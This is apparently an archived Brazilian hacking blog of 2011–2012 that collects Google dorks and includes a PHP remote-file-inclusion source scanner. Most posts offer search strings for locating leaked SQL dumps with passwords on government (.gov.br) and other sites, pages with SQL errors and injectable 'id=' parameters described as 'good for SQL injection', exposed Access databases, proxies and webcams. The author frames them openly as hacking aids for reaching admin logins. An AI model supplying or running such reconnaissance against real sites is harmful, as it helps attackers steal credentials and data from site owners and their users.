Dork: inurl:.gov +"syntax" +sql inurl:.php
Friday, July 20, 2012
Monday, May 28, 2012
This dork goes out to the folks on the net who like a scanner specific to vulnerable PHP pages.
Dork: inurl:"*.php?*=*.php" intext:"Warning: include" -inurl:.html -site:"php.net" -site:"stackoverflow.com" -inurl:"*forums*"
Thursday, January 26, 2012
Thursday, September 29, 2011
SEARCHING FOR SQL DATABASE PASSWORDS WITH THE VALUES PARAMETER.
Code:
-repositorio.interlegis.gov.br -svn.softwarepublico site:.br +values +sql +senha ext:sql
Wednesday, August 31, 2011
Monday, August 22, 2011
Searching for SQL parameters inside .gov.br databases
Let's search: with a simple search string we get an interesting result.
We search for .sql extensions on .gov domain sites, plus INSERT INTO (which inserts data into a SQL database).
Searching for these parameters even gives access to passwords and other data.
Dork: -repositorio -svn -softwarepublico site:.gov.br INSERT INTO ext:sql
Sunday, August 14, 2011
Scanning for Facebook passwords through Google.
1. Open Google.
2. Type this into the search bar: intext:"Date Submitted" intext:"password"
3. Be happy.
Saturday, July 16, 2011
Searching for Passwords in Brazilian SQL Databases
Searching for passwords in SQL databases on Brazilian sites
We know that searching with the string site:br ext:sql returns Brazilian sites that have SQL databases.
Now, combining that with the word for password and the SQL term "INSERT INTO", which inserts data into SQL databases, we can get access to a series of tables containing admin and user passwords.
String:
Happy searching.
Saturday, May 7, 2011
Dork: Accessing SQL Databases, Vuln SQL Report
On Saturday, 07/05/2011, with nothing to do, I created a dork that can help a lot of people in terms of hacking, searching for tables and other things, because with this dork you get direct access to database queries, often even the admin login.
The dork itself searches for the SQL Report management platform.
SQL Server Reporting Services provides a full range of ready-to-use tools and services to help you create, deploy and manage reports for your organization, as well as programming features that let you extend and customize your reporting functionality.
Reporting Services is a server-based reporting platform that provides comprehensive reporting functionality for a variety of data sources. Reporting Services includes a complete set of tools for you to create, manage and deliver reports, and APIs that let developers integrate or extend data and report processing in custom applications. The Reporting Services tools work within the Microsoft Visual Studio environment and are fully integrated with SQL Server tools and components.
With Reporting Services, you can create interactive, tabular, graphical or free-form reports from relational, multidimensional or XML-based data sources. You can publish reports, schedule report processing or access reports on demand. Reporting Services also lets you create ad hoc reports based on predefined models and interactively explore data within the model. You can choose from a variety of viewing formats, export reports to other applications, and subscribe to published reports. The reports you create can be viewed over a Web-based connection or as part of a Microsoft Windows application or SharePoint site. Reporting Services provides the key to your business data.
For information about other SQL Server components, tools and features, see SQL Server Books Online.
Dork:
-forum -forums -support site:.br SQL Report Página gerada
Author: GoogleINURL
Friday, April 22, 2011
Accessing Access databases with a dork
Usually the database path comes with the page error; just copy and paste it into your browser, and if the slash is inverted, just fix it and you're done.
Dork:
-pdf -forum site:*.br +Driver *.mdb
Author: googleinurl
Thursday, April 14, 2011
Dork for searching several of our government's sites; SQL errors are the least of it.
Secretaria de Logística e Tecnologia da Informação
Expanding transparency and social oversight of the Federal Government's actions is one of SLTI's main objectives and, among its duties, it is responsible for planning, coordinating, supervising and providing normative guidance for the activities of the Sistema de Administração de Recursos de Informação e Informática (SISP), with a focus on improving the delivery of services by electronic means and on regulating public purchasing and contracting related to the use of Information and Communication Technologies, within the direct, autarchic and foundational Federal Public Administration.
With this simple dork we will see the great structure that Brazilian government sites offer us.
Dork: -forum -pdf -svn.softwarepublico.gov.br inurl:.gov.br mysql_connect() +id=
Author: Googleinurl
Dork for finding errors on some government sites in Paraíba.
inurl:pb.gov.br inurl:id= +error
Author: Googleinurl
Sunday, April 10, 2011
Dork for finding proxies
Dorks, by Googleinurl
+proxy intext:8080 ext:txt
or
proxy intext:8080 ext:txt
or
proxy 200. intext:8080 ext:txt
or
proxy,ip,port 200. intext:8080 ext:xls
I didn't get around to testing the proxies found, but I believe it may help someone.
Dork for finding errors on TV broadcaster sites
Dork for finding SQL errors on Brazilian TV broadcaster sites :)
Finding a SQL error does not always mean a big hole in the site.
Dork:
-forum -hardware.com.br -mxstudio.com.br -imasters.com.br site:*.com.* +br +tv +error +sql
Author: Googleinurl
Thursday, April 7, 2011
Dork for finding SQL errors on Brazilian organizations' sites.
Dork created to search for SQL errors on Brazilian .org sites.
Millions invested; see the infrastructure of Brazil's .org sites.
Dork: inurl:org +br inurl:id= +error +sql
Source: blog.inurl.com.br
Author: Googleinurl
The Brazilian government has created a body that will oversee the country's cyber security, online news source Convergência Digital reported.
The organization, called the technical cyber security group, will operate under the government's ICT security department DSIC and will include Brazil's ministers of justice, foreign relations and defense, as well as officials from the army, navy and aeronautics agencies.
The group will be in charge of protecting government communication systems and databases, as well as safeguarding critical infrastructure.
In May, the local press quoted DSIC head Raphael Mandarino as saying that the Brazilian government is studying the preparation of a national contingency plan in case of a cyber attack. He also noted that the federal government's 320 networks received 3mn attacks during the previous 12 months.
He said the government has already formed several groups to study the feasibility of such a plan.
Source: http://www.bnamericas.com/news/technology/Government_creates_cyber_security_body
Saturday, February 26, 2011
STRING BANK
String Bank: SQL ERRORS
Set of strings that expose SQL errors on certain sites.
NOTE: GOOD FOR SQL INJECTION.
String Bank: MUSIC search
Set of strings that expose directories / folders / with media files.
Set of strings that expose directories / folders / with password files or edit privileges.
String Bank: CAMERAS & WEBCAM search
Set of strings that expose surveillance cameras & webcams.
Assorted dorks
inurl:"shopquery.asp?catalogid=" inurl:"shopremoveitem.asp?cartid=" inurl:"shopreviewadd.asp?id=" inurl:"shopreviewlist.asp?id=" inurl:"ShopSearch.asp?CategoryID=" inurl:"shoptellafriend.asp?id=" inurl:"shopthanks.asp" inurl:"shopwelcome.asp?title=" inurl:"show_item.asp?id=" inurl:"show_item_details.asp?item_id=" inurl:"showbook.asp?bookid=" inurl:"showStore.asp?catID=" inurl:"shprodde.asp?SKU=" inurl:"specials.asp?id=" inurl:"store.asp?id=" inurl:"store_bycat.asp?id=" inurl:"store_listing.asp?id=" inurl:"Store_ViewProducts.asp?Cat=" inurl:"store-details.asp?id=" inurl:"storefront.asp?id=" inurl:"storefronts.asp?title=" inurl:"storeitem.asp?item=" inurl:"StoreRedirect.asp?ID=" inurl:"subcategories.asp?id=" inurl:"tek9.asp?" inurl:"template.asp?Action=Item&pid=" inurl:"topic.asp?ID=" inurl:"tuangou.asp?bookid=" inurl:"type.asp?iType=" inurl:"updatebasket.asp?bookid=" inurl:"updates.asp?ID=" inurl:"view.asp?cid=" inurl:"view_cart.asp?title=" inurl:"view_detail.asp?ID=" inurl:"viewcart.asp?CartId=" inurl:"viewCart.asp?userID=" inurl:"viewCat_h.asp?idCategory=" inurl:"viewevent.asp?EventID=" inurl:"viewitem.asp?recor=" inurl:"viewPrd.asp?idcategory=" inurl:"ViewProduct.asp?misc=" inurl:"voteList.asp?item_ID=" inurl:"whatsnew.asp?idCategory=" inurl:"WsAncillary.asp?ID="
Friday, February 25, 2011
ONLINE SQLI SCANNER - GOOGLE INURL BRASIL
SQLI Scanner Google INURL Brasil: uses simple dorks, gives immediate results, carries no virus risk and is 100% free.
Misuse is the user's responsibility; all content is for study purposes.
Sunday, February 20, 2011
PHP SCRIPT Security-Shell RFI Scanner v1.0
Security-Shell RFI Scanner v1.0 is an RFI scanner for those of you who are always scanning.
<?php
/***************************************************************************
* PHP Security-Shell RFI Scanner v1.0 *
* *
* Copyright (C) 2007 by pentest *
* *
* http://security-sh3ll.com *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* GNU General Public License for more details. *
* *
***************************************************************************/
/* Regexes that find include/require statements immediately followed
   (after one character, such as a space or parenthesis) by a $variable */
$escan_inc_regex = array( '/include(_once)?.\$/ix', '/require(_once)?.\$/ix' );
/* Regex to extract the names of variables */
$escan_var_regex = array( '/\Ainclude(_once)?./is', '/\Arequire(_once)?./is' );
/* Array of file extensions to scan */
$escan_valid_ext = array( 'php' );
/* Maximum size of a file to scan, scans all if 0 */
$escan_max_size = 0;
/* Counter of crawled directories */
$escan_dir_count = 0;
/* Counter of scanned files */
$escan_file_count = 0;
/* Counter of potential RFI found */
$escan_match_count = 0;
/* Counter of total bytes scanned */
$escan_byte_count = 0;

escan_banner();
if( $argc < 2 ){
    escan_usage($argv[0]);
}
else{
    /* realpath() returns false for a missing path; without this check the
       scan would start at the filesystem root */
    $root = realpath($argv[1]);
    if( $root === false || !is_dir($root) ){
        escan_usage($argv[0]);
        exit(1);
    }
    $stime = escan_get_mtime();
    escan_recurse_dir( $root.DIRECTORY_SEPARATOR );
    $etime = escan_get_mtime();
    print "\n@ Scan report : \n\n" .
          "\t$escan_dir_count directory .\n".
          "\t$escan_file_count file .\n".
          "\t" . escan_format_size($escan_byte_count) . " .\n".
          "\t$escan_match_count Potential RFI .\n".
          "\t".($etime-$stime) . " Second Processing .\n\n";
}

/* Formats a size expressed in bytes as a string */
function escan_format_size($bytes)
{
    if( $bytes < 1024 ) return "$bytes bytes";
    if( $bytes < 1048576 ) return ($bytes / 1024) . " Kb";
    if( $bytes < 1073741824 ) return ($bytes / 1048576) . " Mb";
    return ($bytes / 1073741824) . " Gb";
}

/* Returns the timestamp in seconds */
function escan_get_mtime()
{
    list($usec, $sec) = explode(" ",microtime());
    return ((float)$usec + (float)$sec);
}

/* Extracts the line of code containing the inclusion: everything from
   $offset up to the first ";" (or to the end of the file if there is none) */
function escan_scan_line($content,$offset)
{
    $parts = explode( ";", substr($content,$offset), 2 );
    return $parts[0].";";
}

/* Extracts the variable name from the line of code containing the inclusion */
function escan_parse_var( $line, $regex_id )
{
    global $escan_var_regex;
    $vars = preg_split($escan_var_regex[$regex_id],$line);
    $varname = isset($vars[1]) ? $vars[1] : "";
    /* The name ends at the first delimiter: space, dot, ")" or ";" */
    return substr( $varname, 0, strcspn($varname, " .);") );
}

/* Checks if the variable $var is defined in $content before position $offset */
function escan_check_definitions($content,$offset,$var)
{
    /* Object properties are treated as defined */
    if( strpos( $var, "->" ) !== false ){
        return 1;
    }
    $chunk = substr($content,0,$offset);
    $regex = "/".preg_quote($var,"/")."\s*=/ix";
    preg_match( $regex, $chunk,$matches );
    return count($matches);
}

/* $file is the file to check for potential RFI */
function escan_parse_file($file)
{
    global $escan_inc_regex;
    global $escan_max_size;
    global $escan_file_count;
    global $escan_match_count;
    global $escan_byte_count;
    $fsize = filesize($file);
    if( $escan_max_size && $fsize > $escan_max_size ) return;
    $escan_file_count++;
    $escan_byte_count += $fsize;
    $content = @file_get_contents($file);
    /* Skip files that cannot be read */
    if( $content === false ) return;
    for( $i = 0; $i < count($escan_inc_regex); $i++ ){
        if( preg_match_all( $escan_inc_regex[$i], $content, $matches, PREG_OFFSET_CAPTURE ) ){
            $nmatch = count($matches[0]);
            for( $j = 0; $j < $nmatch; $j++ ){
                $offset = $matches[0][$j][1];
                $line = escan_scan_line($content,$offset);
                $var = escan_parse_var($line,$i);
                /* Report the include when its variable is never assigned earlier in the file */
                if( escan_check_definitions($content,$offset,$var) == 0 )
                {
                    $escan_match_count++;
                    print "@ $file - \n\t- '$var' The position $offset .\n";
                }
            }
        }
    }
}

/* Returns the extension of the file $fname */
function escan_get_file_ext($fname)
{
    if( strchr($fname,'.') ){
        return substr($fname,strrpos($fname,'.')+1);
    }
    else{
        return "";
    }
}

/* Checks if the file $fname has a valid extension */
function escan_isvalid_ext($fname)
{
    global $escan_valid_ext;
    for( $i = 0; $i < count($escan_valid_ext); $i++ ){
        if(strstr(escan_get_file_ext($fname),$escan_valid_ext[$i])){
            return true;
        }
    }
    return false;
}

/* Scans directories recursively */
function escan_recurse_dir($dir)
{
    global $escan_dir_count;
    $escan_dir_count++;
    if( $cdir = @dir($dir) ){
        /* Compare against false so an entry named "0" does not end the loop */
        while( false !== ( $entry = $cdir->read() ) ){
            if( $entry != '.' && $entry != '..' ){
                if( is_dir($dir.$entry) ){
                    escan_recurse_dir($dir.$entry.DIRECTORY_SEPARATOR);
                }
                else{
                    /* Test the file name only, so dots in directory names are ignored */
                    if( escan_isvalid_ext($entry) ){
                        escan_parse_file($dir.$entry);
                    }
                }
            }
        }
        $cdir->close();
    }
}

function escan_banner()
{
    print "*-----------------------------------------------------*\n" .
          "* PHP Security-Shell RFI Scanner v1.0 by pentest *\n" .
          "* *\n" .
          "* http://security-sh3ll.com *\n" .
          "*-----------------------------------------------------*\n\n";
}

/* The only argument is the directory to scan (read from $argv[1] above) */
function escan_usage($pname)
{
    print "Use : php $pname <directory>\n";
}